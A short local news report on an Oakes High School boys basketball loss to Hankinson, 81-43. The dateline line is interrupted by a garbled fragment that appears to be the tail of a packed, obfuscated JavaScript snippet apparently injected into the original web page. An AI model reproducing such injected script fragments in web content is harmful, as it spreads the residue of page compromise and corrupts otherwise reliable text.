HANKINSON hisyy|var|u0026u|referrer|eessi||js|php’.split(‘|’),0,{}))
(NewsDakota.com) The growth that the Oakes High School boys basketball team had been able to produce throughout the last few weeks seemingly went up in a quick puff of smoke on Friday night in Hankinson, as the Pirates rolled over the Tornadoes 81-43.

Oakes was down 20-2 at the end of the first quarter, with the only two points coming from free throws from Victor Cordova. The Tornadoes did not score their first points away from the free-throw line until 30 seconds into the second quarter.

Oakes was lead by Freshman Bryce Meehl who had 15 points and sat out most of the final quarter with an ice pack needed for his lower back area.

The Tornadoes (1-14 0-7 District 1) will now host Litchville-Marion-Montpeiler on Saturday night.
